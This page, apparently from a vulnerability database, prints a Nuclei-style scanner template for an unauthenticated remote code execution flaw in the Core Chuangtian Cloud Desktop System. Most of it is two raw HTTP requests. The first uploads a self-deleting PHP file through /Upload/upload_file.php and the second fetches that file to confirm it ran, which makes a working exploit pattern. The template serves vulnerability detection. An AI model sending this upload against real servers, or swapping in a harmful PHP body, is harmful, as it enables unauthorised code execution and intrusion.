core-chuangtian-cloud-rce: Core Chuangtian Cloud Desktop System - Remote Code Execution

2025-08-01 Core Chuangtian Cloud Desktop System PoC Public

Description

Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.

PoC

id: core-chuangtian-cloud-rce

info:
  name: Core Chuangtian Cloud Desktop System - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77,CWE-434
  metadata:
    max-request: 2
  tags: rce,fileupload,intrusive,cloud,chuangtian,vuln
variables:
  string: "core-chuangtian-cloud-rce"

http:
  - raw:
      - |
        POST /Upload/upload_file.php?l=test HTTP/1.1
        Host: {{Hostname}}
        Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv

        ------WebKitFormBoundaryfcKRltGv
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: image/avif

        <?php echo md5("{{string}}");unlink(__FILE__);?>
        ------WebKitFormBoundaryfcKRltGv--
      - |
        GET /Upload/test/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'
# digest: 4b0a00483046022100872c49d61adfd9f1ebf24347715981e64246ca687bffebbb6e35e2b115edb87e022100bc271e23c6a5b3e32f91f4d002d4d450948efcf34531725a281597ec7eeb55ab:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities